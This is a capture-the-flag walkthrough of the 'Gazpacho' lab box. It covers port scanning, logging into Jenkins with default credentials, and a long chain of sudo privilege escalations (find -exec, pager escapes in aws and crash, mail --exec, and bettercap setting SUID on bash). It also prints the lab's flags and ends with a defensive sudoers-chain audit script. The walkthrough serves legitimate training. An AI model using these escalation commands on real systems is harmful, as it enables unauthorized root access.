TheHackersLabs-Gazpacho Box Walkthrough (WP)
Author: 城南花已开

Information Gathering

Service Enumeration

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.150 08:00:27:a0:99:3b PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f0:df:73 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.049 seconds (124.94 hosts/sec). 4 responded
export ip=192.168.60.150
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.150:22
Open 192.168.60.150:80
Open 192.168.60.150:8080
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 21:02 CST
Initiating ARP Ping Scan at 21:02
Scanning 192.168.60.150 [1 port]
Completed ARP Ping Scan at 21:02, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:02
Completed Parallel DNS resolution of 1 host. at 21:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:02
Scanning 192.168.60.150 [3 ports]
Discovered open port 22/tcp on 192.168.60.150
Discovered open port 80/tcp on 192.168.60.150
Discovered open port 8080/tcp on 192.168.60.150
Completed SYN Stealth Scan at 21:02, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.150
Host is up, received arp-response (0.00093s latency).
Scanned at 2025-01-14 21:02:33 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
8080/tcp open http-proxy syn-ack ttl 64
MAC Address: 08:00:27:A0:99:3B (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Port 8080 is running Jenkins; port 80 only has a login form that redirects to a Not Found page.

There is an RCE exploit for Jenkins on GitHub:

gquere/pwn_jenkins: Notes about attacking Jenkins servers

Vulnerability Entry Point

But when I tried logging in with the default password, it just let me in:

admin:12345

Jenkins can be thought of as an automation server: it runs build and deployment jobs automatically.

It has a Script Console that can execute commands, which is what gives us a reverse shell here.


sudo Privilege Escalation

With a shell as jenkins, the user has sudo rights, so escalate to the ajo user.

Not sure why PS1 is garbled, but it doesn't matter much as long as the shell works.

(remote) jenkins@gazpacho:/home/pepino$ sudo -l
Matching Defaults entries for jenkins on gazpacho:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User jenkins may run the following commands on gazpacho:
(ajo) NOPASSWD: /usr/bin/find
(remote) jenkins@gazpacho:/home/pepino$ sudo -u ajo /usr/bin/find . -exec /bin/sh \; -quit
\[\](remote)\[\] \[\]ajo@gazpacho\[\]:\[\]/home/pepino\[\]$ id
uid=1004(ajo) gid=1004(ajo) grupos=1004(ajo)

User ajo also has sudo rights. Is this a nesting doll?

(remote) ajo@gazpacho:/home/ajo$ sudo -l
Matching Defaults entries for ajo on gazpacho:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ajo may run the following commands on gazpacho:
(cebolla) NOPASSWD: /usr/bin/aws

Oh, after switching from sh to bash the PS1 is back to normal.

(remote) ajo@gazpacho:/home/ajo$ sudo -u cebolla /usr/bin/aws help
## help here invokes less, so shrink the window and then type !/bin/sh
cebolla@gazpacho:/home/ajo$ id
uid=1002(cebolla) gid=1002(cebolla) grupos=1002(cebolla)
cebolla@gazpacho:~$ sudo -l
Matching Defaults entries for cebolla on gazpacho:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User cebolla may run the following commands on gazpacho:
(pimiento) NOPASSWD: /usr/bin/crash

Ugh, it really is nesting dolls all the way down. What a grind.

cebolla@gazpacho:~$ sudo -u pimiento /usr/bin/crash -h
# Same as above, this also invokes less
pimiento@gazpacho:~$ sudo -l
Matching Defaults entries for pimiento on gazpacho:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User pimiento may run the following commands on gazpacho:
(pepino) NOPASSWD: /usr/bin/cat
pimiento@gazpacho:~$ sudo -u pepino /usr/bin/cat /home/pepino/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

User Privilege Escalation

With the private key in hand, crack its passphrase.

❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mittens (id_rsa)
1g 0:00:00:58 DONE (2025-01-14 21:46) 0.01718g/s 43.44p/s 43.44c/s 43.44C/s shamrock..canela
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh pepino@$ip -i id_rsa
The authenticity of host '192.168.60.150 (192.168.60.150)' can't be established.
ED25519 key fingerprint is SHA256:AQriN/tRYOEaFyAyEecHnEyZfJTHLRILd1G2j74ViR8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.150' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux gazpacho 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Mon Apr 29 18:48:07 2024 from 192.168.0.108
pepino@gazpacho:~$ sudo -l
Matching Defaults entries for pepino on gazpacho:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User pepino may run the following commands on gazpacho:
(tomate) NOPASSWD: /usr/bin/mail

Still nesting. And user.txt can't even be read yet, so there are more layers to go.

pepino@gazpacho:~$ sudo -u tomate /usr/bin/mail --exec='!/bin/bash'
tomate@gazpacho:/home/pepino$ id
uid=1003(tomate) gid=1003(tomate) grupos=1003(tomate)
tomate@gazpacho:/home/pepino$ cd ~
tomate@gazpacho:~$ ls
user.txt
tomate@gazpacho:~$ cat user.txt
cat: user.txt: Permiso denegado
tomate@gazpacho:~$ sudo -l
Matching Defaults entries for tomate on gazpacho:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User tomate may run the following commands on gazpacho:
(root) NOPASSWD: /usr/bin/bettercap

Root Privilege Escalation

I've run into bettercap before on DockerLabs:

[DockerLabs] AguaDeMayo Walkthrough (WP) | Pepster's Blog

Commands can be executed from inside it.

192.168.60.0/24 > 192.168.60.150  » !cat user.txt
8cd90f96cb765b81b730f159dfc86c08
192.168.60.0/24 > 192.168.60.150 » ! chmod +s /bin/bash
192.168.60.0/24 > 192.168.60.150 » exit
tomate@gazpacho:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 abr 23 2023 /bin/bash
tomate@gazpacho:~$ bash -p
bash-5.2# whoami
root
bash-5.2# cat user.txt
8cd90f96cb765b81b730f159dfc86c08
bash-5.2# cat /root/root.txt
aea540e02fcd9062fd1bdf748ff8fa41
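The whole box is a chain of NOPASSWD sudo delegations, each handing a shell (or a file read) to the next user until root. As an added example that is not part of the write-up, here is a small audit script that walks sudoers-style rules and reports every delegation chain that reaches root, so an administrator can spot this kind of nesting-doll misconfiguration. The rule table is constructed from the sudo -l entries shown above (plus one unrelated rule); the SHELL_CAPABLE set lists the binaries this write-up used to reach a shell.

```python
from collections import defaultdict

# Constructed sample modelled on the sudoers delegations seen on this box.
# Format: "user  runas  binary", one NOPASSWD rule per line.
SAMPLE_RULES = """
jenkins  ajo       /usr/bin/find
ajo      cebolla   /usr/bin/aws
cebolla  pimiento  /usr/bin/crash
pimiento pepino    /usr/bin/cat
pepino   tomate    /usr/bin/mail
tomate   root      /usr/bin/bettercap
www-data backup    /usr/bin/rsync
"""

# Binaries that handed the target user an interactive shell in the write-up
# (find -exec, pager escapes in aws/crash, mail --exec, bettercap's '!').
SHELL_CAPABLE = {"find", "aws", "crash", "mail", "bettercap"}

def parse_rules(text):
    """Return {user: [(runas, binary), ...]} from the constructed rule text."""
    graph = defaultdict(list)
    for line in text.strip().splitlines():
        user, runas, binary = line.split()
        graph[user].append((runas, binary))
    return graph

def find_paths_to_root(graph, start):
    """Depth-first search of every delegation chain from start ending at root."""
    paths = []
    def walk(user, path, seen):
        for runas, binary in graph.get(user, []):
            if runas in seen:            # avoid cycles such as a <-> b
                continue
            hop = (user, runas, binary)
            if runas == "root":
                paths.append(path + [hop])
            else:
                walk(runas, path + [hop], seen | {runas})
    walk(start, [], {start})
    return paths

def audit(text, start):
    """One finding per root-reaching chain, noting hops that are not direct shells."""
    findings = []
    for path in find_paths_to_root(parse_rules(text), start):
        non_shell = [b for _, _, b in path if b.rsplit("/", 1)[-1] not in SHELL_CAPABLE]
        chain = " -> ".join([path[0][0]] + [runas for _, runas, _ in path])
        findings.append({"hops": len(path), "chain": chain, "non_shell_hops": non_shell})
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_RULES, "jenkins"):
        print(finding)
```

Run against a real system, the rule text would be built from visudo -c -f style output or from each user's sudo -l; a chain longer than one hop, or any hop through a pager-capable tool, is worth removing.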

This box really is dull, nesting dolls the whole way 😅
